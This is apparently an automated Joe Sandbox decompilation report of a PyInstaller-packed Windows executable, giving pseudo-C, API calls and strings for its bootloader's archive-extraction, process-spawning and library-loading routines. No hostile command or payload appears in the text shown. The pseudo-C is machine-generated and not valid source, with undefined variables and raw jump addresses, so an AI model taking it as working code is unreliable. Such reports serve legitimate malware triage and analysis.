Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _fread_nolock$Message_invalid_parameter_noinfo
String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
API String ID: 2153230061-4158440160
Opcode ID: 7bb382748f2785d6775414b66a3ba205b8fc888bdbd73f960dbf91cd75aa2d63
Instruction ID: 6aac1e66fc88cc3e3ba7810b3fd081368aa974dcec832ee59b3fd5f1791c9f16
Opcode Fuzzy Hash: 7bb382748f2785d6775414b66a3ba205b8fc888bdbd73f960dbf91cd75aa2d63
Instruction Fuzzy Hash: 48513D72A096028AFF56EF24D49017CA3A1FF88B58BD98576DD0D83396DF3CE5608750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D1440 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FF77FF7DA8D1440(void* __rcx, void* __rdx) {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t5;
				void* _t9;
				void* _t10;

				_t1 = E00007FF77FF7DA8D6700(_t2, _t3, _t5, __rcx, _t9, _t10); // executed
				if (_t1 != 0xffffffff) goto 0xda8d1462;
				return _t1;
			}

0x7ff7da8d144f
0x7ff7da8d1457
0x7ff7da8d1461

Strings

fwrite, xrefs: 00007FF7DA8D15DC
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7DA8D15E5
fread, xrefs: 00007FF7DA8D15EC
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7DA8D14F9
Failed to extract %s: failed to open target file!, xrefs: 00007FF7DA8D148A
malloc, xrefs: 00007FF7DA8D1560
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF7DA8D15D5
fopen, xrefs: 00007FF7DA8D1491
fseek, xrefs: 00007FF7DA8D1500
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF7DA8D1559
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7DA8D14CA

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID:
String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 0-666925554
Opcode ID: 986025e21c177242ba703baca0f1e812dfac8494b3ab6e968003ecb85309cb59
Instruction ID: f6d685693745667565604d7d7fa85439620feabb7355ab393b37040e73eb1ef2
Opcode Fuzzy Hash: 986025e21c177242ba703baca0f1e812dfac8494b3ab6e968003ecb85309cb59
Instruction Fuzzy Hash: BE518A61B0864389FE12BB11E4006BDE361BF55BA4FC849B3DE1D476D7EE2CE5658320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D7810 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00007FF7DA8D683A,?,00007FF7DA8D672D), ref: 00007FF7DA8D7850
OpenProcessToken.ADVAPI32(?,00007FF7DA8D672D), ref: 00007FF7DA8D7861
GetTokenInformation.KERNELBASE(?,00007FF7DA8D672D(TokenIntegrityLevel)), ref: 00007FF7DA8D7883
GetLastError.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF7DA8D788D
GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel), ref: 00007FF7DA8D78CA
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7DA8D78DC
CloseHandle.KERNEL32(?,00007FF7DA8D672D), ref: 00007FF7DA8D78F4
LocalFree.KERNEL32(?,00007FF7DA8D672D), ref: 00007FF7DA8D7926
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF7DA8D794D
CreateDirectoryW.KERNELBASE(?,00007FF7DA8D672D), ref: 00007FF7DA8D795E

Strings

D:(A;;FA;;;%s), xrefs: 00007FF7DA8D7909
S-1-3-4, xrefs: 00007FF7DA8D78FF

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
String ID: D:(A;;FA;;;%s)$S-1-3-4
API String ID: 4998090-2855260032
Opcode ID: 65d94a69081515f26e8bc9efcd43c7fc9d065871b89001ad1bbc68354557f638
Instruction ID: d8a93cd9a32f860a230678db6524784bf4b175b6c7ca4aa4eb55c35e39090a53
Opcode Fuzzy Hash: 65d94a69081515f26e8bc9efcd43c7fc9d065871b89001ad1bbc68354557f638
Instruction Fuzzy Hash: 45417131A1868386FA11AF10E4446AEF360FB847A4FC40672EE5E47696DF3CE559C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D6F50 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00007FF77FF7DA8D6F50(void* __rax, long long __rbx, void* __rcx, long long _a16, short _a24, intOrPtr _a32, long long _a40, long long _a48, long long _a56, long long _a64, intOrPtr _a72, char _a80, long long _a88, short _a96, char _a104, char _a136, long long _a144, intOrPtr _a196, short _a200, signed long long _a216, signed long long _a224, signed long long _a232, char _a248, signed int _a8440, void* _a8480) {
				int _t47;
				signed long long _t67;
				signed long long _t68;
				long long _t90;
				void* _t91;
				void* _t92;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;

				_a16 = __rbx;
				E00007FF77FF7DA8DAD20(0x2110, __rax, _t98, _t99);
				_t67 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t68 = _t67 ^ _t92 - __rax;
				_a8440 = _t68;
				_a72 = 0;
				r8d = 0x1000;
				E00007FF77FF7DA8D79A0(_t68, __rbx,  &_a248, __rcx, _t91, _t95);
				SetConsoleCtrlHandler(??, ??); // executed
				_a80 = 0x18;
				_a88 = _t90;
				_a96 = 1;
				GetStartupInfoW(??);
				asm("xorps xmm0, xmm0");
				_a144 = _t90;
				asm("movdqa [esp+0xa0], xmm0");
				_a196 = 0x101;
				_a200 = 1;
				E00007FF77FF7DA8E41C0(0, _t68);
				E00007FF77FF7DA8E6E48(E00007FF77FF7DA8E90D4(_t68, _t68), _t68);
				_a216 = _t68;
				E00007FF77FF7DA8E41C0(1, _t68);
				E00007FF77FF7DA8E6E48(E00007FF77FF7DA8E90D4(_t68, _t68), _t68);
				_t14 = _t90 + 2; // 0x2
				_a224 = _t68;
				E00007FF77FF7DA8E41C0(_t14, _t68);
				E00007FF77FF7DA8E6E48(E00007FF77FF7DA8E90D4(_t68, _t68), _t68);
				_a232 = _t68;
				GetCommandLineW();
				r9d = 0;
				_a64 =  &_a104;
				_a56 =  &_a136;
				_a48 = _t90;
				_a40 = _t90;
				_a32 = 0;
				_a24 = 1;
				_t47 = CreateProcessW(??, ??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
				if (_t47 == 0) goto 0xda8d70b8;
				WaitForSingleObject(??, ??);
				GetExitCodeProcess(??, ??); // executed
				goto 0xda8d70d0;
				E00007FF77FF7DA8D2620(_t47,  &_a136, "CreateProcessW", "Error creating child process!\n",  &_a80, _t97);
				return E00007FF77FF7DA8DACF0(0xffffffff, _t44, _a8440 ^ _t92 - __rax);
			}

0x7ff7da8d6f50
0x7ff7da8d6f5b
0x7ff7da8d6f63
0x7ff7da8d6f6a
0x7ff7da8d6f6d
0x7ff7da8d6f82
0x7ff7da8d6f86
0x7ff7da8d6f8c
0x7ff7da8d6f9f
0x7ff7da8d6fad
0x7ff7da8d6fb5
0x7ff7da8d6fba
0x7ff7da8d6fbe
0x7ff7da8d6fc4
0x7ff7da8d6fc7
0x7ff7da8d6fd1
0x7ff7da8d6fda
0x7ff7da8d6fe5
0x7ff7da8d6fed
0x7ff7da8d6ffc
0x7ff7da8d7003
0x7ff7da8d700b
0x7ff7da8d701a
0x7ff7da8d701f
0x7ff7da8d7022
0x7ff7da8d702a
0x7ff7da8d7039
0x7ff7da8d703e
0x7ff7da8d7046
0x7ff7da8d704c
0x7ff7da8d7064
0x7ff7da8d7071
0x7ff7da8d7076
0x7ff7da8d707b
0x7ff7da8d7080
0x7ff7da8d7084
0x7ff7da8d7088
0x7ff7da8d7090
0x7ff7da8d709c
0x7ff7da8d70ac
0x7ff7da8d70b6
0x7ff7da8d70c6
0x7ff7da8d70f0

APIs

Part of subcall function 00007FF7DA8D79A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7DA8D79DA

SetConsoleCtrlHandler.KERNELBASE(00000000,00007FF7DA8D3A10), ref: 00007FF7DA8D6F9F
GetStartupInfoW.KERNEL32 ref: 00007FF7DA8D6FBE

Part of subcall function 00007FF7DA8E90D4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E90E8

Part of subcall function 00007FF7DA8E6E48: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E6EAF

GetCommandLineW.KERNEL32 ref: 00007FF7DA8D7046
CreateProcessW.KERNELBASE ref: 00007FF7DA8D7088
WaitForSingleObject.KERNEL32 ref: 00007FF7DA8D709C
GetExitCodeProcess.KERNELBASE ref: 00007FF7DA8D70AC

Strings

Error creating child process!, xrefs: 00007FF7DA8D70B8
CreateProcessW, xrefs: 00007FF7DA8D70BF

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Error creating child process!
API String ID: 2895956056-3524285272
Opcode ID: a68fb7304a42ac273bc53bf185094bfbd624d4ea67b8908c2ccc1c8bf35a7020
Instruction ID: fe290bdd321b5e6ad29992a19bfce8018d0919ed447951aab990f5a979b7050a
Opcode Fuzzy Hash: a68fb7304a42ac273bc53bf185094bfbd624d4ea67b8908c2ccc1c8bf35a7020
Instruction Fuzzy Hash: 03413F32A0878286EA11AB60F4452AEF7A4FFE4350FD00576EA8D43B96DF7CD1648B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D1000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7DA8D3B80: GetModuleFileNameW.KERNEL32(?,00007FF7DA8D3679), ref: 00007FF7DA8D3BB1

SetDllDirectoryW.KERNEL32 ref: 00007FF7DA8D3885

Part of subcall function 00007FF7DA8D6970: GetEnvironmentVariableW.KERNEL32(00007FF7DA8D36C7), ref: 00007FF7DA8D69AA
Part of subcall function 00007FF7DA8D6970: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7DA8D69C7

Strings

_PYI_ONEDIR_MODE, xrefs: 00007FF7DA8D36DC, 00007FF7DA8D3707
Cannot side-load external archive %s (code %d)!, xrefs: 00007FF7DA8D380C
_MEIPASS2, xrefs: 00007FF7DA8D36B3, 00007FF7DA8D371C, 00007FF7DA8D39CB, 00007FF7DA8D39DB
Cannot open PyInstaller archive from executable (%s) or external archive (%s), xrefs: 00007FF7DA8D376E
Failed to convert DLL search path!, xrefs: 00007FF7DA8D386D
MEI, xrefs: 00007FF7DA8D37C7

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
API String ID: 2344891160-3602715111
Opcode ID: 06f4c7843c175cd0a5cfcda01dfa76b592df23f17a5d99dd95b75d05dda82c26
Instruction ID: baf991c8d9645cd1c75a6ac5a2bbcf806b88885f77043d97bb43af0c08f1b38c
Opcode Fuzzy Hash: 06f4c7843c175cd0a5cfcda01dfa76b592df23f17a5d99dd95b75d05dda82c26
Instruction Fuzzy Hash: CFB1A061A1DA8359FE66BB2198502FDD250FF80784FC840B3EE4D47697EF2CE5258720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D1050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00007FF77FF7DA8D1050(long long __rax, long long __rcx, long long __rdx, void* __r8, void* __r9) {
				void* __rbx;
				void* _t13;
				void* _t28;
				void* _t31;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t41;
				void* _t44;

				_t40 = __r9;
				_t39 = __r8;
				_t18 = __rax;
				 *((long long*)(_t36 + 0x10)) = __rdx;
				 *((long long*)(_t36 + 8)) = __rcx;
				_push(_t34);
				_t37 = _t36 - 0x88;
				 *((long long*)(_t37 + 0x50)) = __rax;
				 *((long long*)(_t37 + 0x58)) = __rax;
				 *((long long*)(_t37 + 0x60)) = __rax;
				_t6 = _t18 + 0x58; // 0x58
				r8d = _t6;
				 *((intOrPtr*)(_t37 + 0x28)) = 0;
				 *((long long*)(_t37 + 0x20)) = __rax;
				_t13 = E00007FF77FF7DA8D98D0(__rdx, _t37 + 0x20, "1.2.13");
				r15d = _t13;
				if (_t13 == 0) goto 0xda8d10d3;
				r8d = _t13;
				E00007FF77FF7DA8D2770(_t18, "Failed to extract %s: inflateInit() failed with return code %d!\n", __rdx + 0x12, _t39, _t40, _t44, _t41, _t28, _t31);
				_t11 = _t34 - 1; // -1
				return _t11;
			}

0x7ff7da8d1050
0x7ff7da8d1050
0x7ff7da8d1050
0x7ff7da8d1050
0x7ff7da8d1055
0x7ff7da8d105b
0x7ff7da8d1062
0x7ff7da8d1071
0x7ff7da8d1079
0x7ff7da8d1085
0x7ff7da8d108a
0x7ff7da8d108a
0x7ff7da8d108e
0x7ff7da8d1097
0x7ff7da8d10a1
0x7ff7da8d10a6
0x7ff7da8d10ab
0x7ff7da8d10b1
0x7ff7da8d10bb
0x7ff7da8d10c0
0x7ff7da8d10d2

Strings

Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF7DA8D1249
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF7DA8D111F
malloc, xrefs: 00007FF7DA8D10F8, 00007FF7DA8D1126
1.2.13, xrefs: 00007FF7DA8D107E
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF7DA8D10B4
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF7DA8D10F1

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Message
String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-1655038675
Opcode ID: 9ad42e33b81d52d0ab0f006253fb0e0753a8aaead35cae6bf62151921f0952db
Instruction ID: b3684fd851c4ea9f5415e35edc2e6a9974a411be8bf9f4533696a5fb81c7b5ed
Opcode Fuzzy Hash: 9ad42e33b81d52d0ab0f006253fb0e0753a8aaead35cae6bf62151921f0952db
Instruction Fuzzy Hash: B451AC22A0968289FE22FB51A4403BEE290BF84794FC84176DE4D876C6EF3CE5658310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EDD08 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E00007FF77FF7DA8EDD08(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				void* _t35;
				signed long long _t56;
				intOrPtr _t60;
				signed long long _t71;
				signed long long _t72;
				long long _t78;
				void* _t82;
				signed long long _t88;
				signed long long _t89;
				signed long long _t90;
				long _t91;
				void* _t94;
				WCHAR* _t97;
				WCHAR* _t102;

				 *((long long*)(_t82 + 8)) = __rbx;
				 *((long long*)(_t82 + 0x10)) = _t78;
				 *((long long*)(_t82 + 0x18)) = __rsi;
				_push(_t71);
				r15d = __ecx;
				_t72 = _t71 | 0xffffffff;
				_t89 =  *0xda90d008; // 0xde4e6c2f3c2e
				_t88 =  *(0x7ff7da8d0000 + 0x4cf00 + _t102 * 8) ^ _t89;
				asm("dec ecx");
				if (_t88 == _t72) goto 0xda8ede4b;
				if (_t88 == 0) goto 0xda8edd6d;
				_t56 = _t88;
				goto 0xda8ede4d;
				if (__r8 == __r9) goto 0xda8ede30;
				_t60 =  *((intOrPtr*)(0x7ff7da8d0000 + 0x4ce50 + __rsi * 8));
				if (_t60 == 0) goto 0xda8edd95;
				if (_t60 != _t72) goto 0xda8ede8a;
				goto 0xda8ede1c;
				r8d = 0x800; // executed
				LoadLibraryW(_t102); // executed
				if (_t56 != 0) goto 0xda8ede6a;
				if (GetLastError() != 0x57) goto 0xda8ede0a;
				_t14 = _t56 - 0x50; // -80
				_t35 = _t14;
				r8d = _t35;
				if (E00007FF77FF7DA8E9950(__r8) == 0) goto 0xda8ede0a;
				r8d = _t35;
				if (E00007FF77FF7DA8E9950(__r8) == 0) goto 0xda8ede0a;
				r8d = 0;
				LoadLibraryExW(_t97, _t94, _t91);
				if (_t56 != 0) goto 0xda8ede6a;
				 *((intOrPtr*)(0x7ff7da8d0000 + 0x4ce50 + __rsi * 8)) = _t72;
				if (__r8 + 4 != __r9) goto 0xda8edd76;
				_t90 =  *0xda90d008; // 0xde4e6c2f3c2e
				asm("dec eax");
				 *(0x7ff7da8d0000 + 0x4cf00 + _t102 * 8) = _t72 ^ _t90;
				return 0;
			}

0x7ff7da8edd08
0x7ff7da8edd0d
0x7ff7da8edd12
0x7ff7da8edd17
0x7ff7da8edd24
0x7ff7da8edd2e
0x7ff7da8edd44
0x7ff7da8edd4b
0x7ff7da8edd54
0x7ff7da8edd5a
0x7ff7da8edd63
0x7ff7da8edd65
0x7ff7da8edd68
0x7ff7da8edd70
0x7ff7da8edd79
0x7ff7da8edd85
0x7ff7da8edd8a
0x7ff7da8edd90
0x7ff7da8edda2
0x7ff7da8edda8
0x7ff7da8eddb4
0x7ff7da8eddc3
0x7ff7da8eddc5
0x7ff7da8eddc5
0x7ff7da8eddcb
0x7ff7da8edddc
0x7ff7da8eddde
0x7ff7da8eddf2
0x7ff7da8eddf4
0x7ff7da8eddfc
0x7ff7da8ede08
0x7ff7da8ede14
0x7ff7da8ede23
0x7ff7da8ede29
0x7ff7da8ede3d
0x7ff7da8ede43
0x7ff7da8ede69

APIs

FreeLibrary.KERNEL32(?,00000000,?,00007FF7DA8EE0A2,?,?,-00000018,00007FF7DA8EA173,?,?,?,00007FF7DA8EA06A,?,?,?,00007FF7DA8E53C2), ref: 00007FF7DA8EDE84
GetProcAddress.KERNEL32(?,00000000,?,00007FF7DA8EE0A2,?,?,-00000018,00007FF7DA8EA173,?,?,?,00007FF7DA8EA06A,?,?,?,00007FF7DA8E53C2), ref: 00007FF7DA8EDE90

Strings

api-ms-, xrefs: 00007FF7DA8EDDCE
ext-ms-, xrefs: 00007FF7DA8EDDE1

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 05b603102d198864137dbc22e1d5c79a95c136e16b7dfd1a6baa0dacd04be2dd
Instruction ID: 38165dca2cd61530afb46067c13f525548d298152e40c60e04b0d855c0d1de73
Opcode Fuzzy Hash: 05b603102d198864137dbc22e1d5c79a95c136e16b7dfd1a6baa0dacd04be2dd
Instruction Fuzzy Hash: 5C411322B09A03C1FA13BB12980457DA391BF64BA0FC88176DD0D97786EF3DE9598360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EAE7C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00007FF77FF7DA8EAE7C(void* __ebx, signed int __ecx, intOrPtr* __rax, long long __rbx, long long __rdx, char _a8, long long _a16, long long _a24, intOrPtr _a32) {
				void* _v72;
				long long _v80;
				signed int _v88;
				long long _v96;
				void* _v104;
				unsigned long long _v120;
				void* __rdi;
				void* __rbp;
				char _t142;
				int _t151;
				void* _t152;
				void* _t156;
				void* _t162;
				char _t170;
				char _t171;
				signed int _t175;
				signed char _t178;
				void* _t198;
				void* _t199;
				void* _t200;
				unsigned int _t202;
				void* _t205;
				long long _t210;
				long long _t246;
				intOrPtr _t247;
				signed long long _t254;
				signed short* _t258;
				intOrPtr* _t260;
				char* _t263;
				signed long long _t278;
				void* _t280;
				unsigned long long _t285;
				void* _t286;
				signed long long _t291;
				signed long long _t292;
				unsigned long long _t293;
				signed short* _t295;
				signed short* _t301;
				signed short* _t302;
				unsigned long long _t306;
				signed long long _t308;
				char* _t310;
				char* _t311;
				char* _t312;
				signed long long _t313;

				_t273 = __rdx;
				_t162 = __ebx;
				_a24 = __rbx;
				_a16 = __rdx;
				r12d = r8d;
				if (r13d != 0xfffffffe) goto 0xda8eaebd;
				E00007FF77FF7DA8E4374(__rax);
				 *__rax = 0;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 9;
				goto 0xda8eb2ae;
				if (__ecx < 0) goto 0xda8eb297;
				_t205 = r13d -  *0xda91ce20; // 0x40
				if (_t205 >= 0) goto 0xda8eb297;
				_t3 = _t285 + 1; // 0x1
				_t178 = _t3;
				_v80 = __rdx;
				_t291 = __ecx >> 6;
				_v88 = _t291;
				_t308 = __ecx + __ecx * 8;
				_t246 =  *((intOrPtr*)(0xda91ca20 + _t291 * 8));
				if (( *(_t246 + 0x38 + _t308 * 8) & _t178) == 0) goto 0xda8eb297;
				if (r12d - 0x7fffffff <= 0) goto 0xda8eaf28;
				E00007FF77FF7DA8E4374(_t246);
				 *_t246 = 0;
				E00007FF77FF7DA8E4394(_t246);
				 *_t246 = 0x16;
				goto 0xda8eb2a9;
				if (r12d == 0) goto 0xda8eb293;
				if (( *(_t246 + 0x38 + _t308 * 8) & 0x00000002) != 0) goto 0xda8eb293;
				_t210 = __rdx;
				if (_t210 == 0) goto 0xda8eaf11;
				r10d =  *((char*)(_t246 + 0x39 + _t308 * 8));
				_v96 =  *((intOrPtr*)(_t246 + 0x28 + _t308 * 8));
				_a8 = r10b;
				if (_t210 == 0) goto 0xda8eaf9a;
				if (r10d - _t178 != _t178) goto 0xda8eaf92;
				if ((_t178 &  !r12d) != 0) goto 0xda8eaf92;
				E00007FF77FF7DA8E4374(_t246);
				 *_t246 = 0;
				E00007FF77FF7DA8E4394(_t246);
				 *_t246 = 0x16;
				E00007FF77FF7DA8E9D00();
				goto 0xda8eb120;
				goto 0xda8eb018;
				if ((_t178 &  !r12d) == 0) goto 0xda8eaf76;
				_t198 =  <  ? 4 : r12d >> 1;
				E00007FF77FF7DA8ECA1C(_t246,  *((intOrPtr*)(_t246 + 0x28 + _t308 * 8)));
				_t263 = _t246;
				E00007FF77FF7DA8E9D68(_t246,  *((intOrPtr*)(_t246 + 0x28 + _t308 * 8)));
				E00007FF77FF7DA8E9D68(_t246,  *((intOrPtr*)(_t246 + 0x28 + _t308 * 8)));
				_t310 = _t263;
				if (_t263 != 0) goto 0xda8eafe8;
				E00007FF77FF7DA8E4394(_t246);
				 *_t246 = 0xc;
				E00007FF77FF7DA8E4374(_t246);
				 *_t246 = 8;
				goto 0xda8eb120;
				_t32 = _t273 + 1; // 0x1
				r8d = _t32;
				E00007FF77FF7DA8EB6A4(_t246, _t263, _t280);
				_t292 = _v88;
				r10b = _a8;
				 *((long long*)( *((intOrPtr*)(0xda91ca20 + _t292 * 8)) + 0x30 + _t308 * 8)) = _t246;
				_t247 =  *((intOrPtr*)(0xda91ca20 + _t292 * 8));
				_v72 = _t310;
				r9d = 0xa;
				if (( *(_t247 + 0x38 + _t308 * 8) & 0x00000048) == 0) goto 0xda8eb0aa;
				_t142 =  *((intOrPtr*)(_t247 + 0x3a + _t308 * 8));
				if (_t142 == r9b) goto 0xda8eb0aa;
				if (_t198 == 0) goto 0xda8eb0aa;
				 *_t310 = _t142;
				_t199 = _t198 - 1;
				_t311 = _t310 + __rdx;
				 *((intOrPtr*)( *((intOrPtr*)(0xda91ca20 + _t292 * 8)) + 0x3a + _t308 * 8)) = r9b;
				if (r10b == 0) goto 0xda8eb0aa;
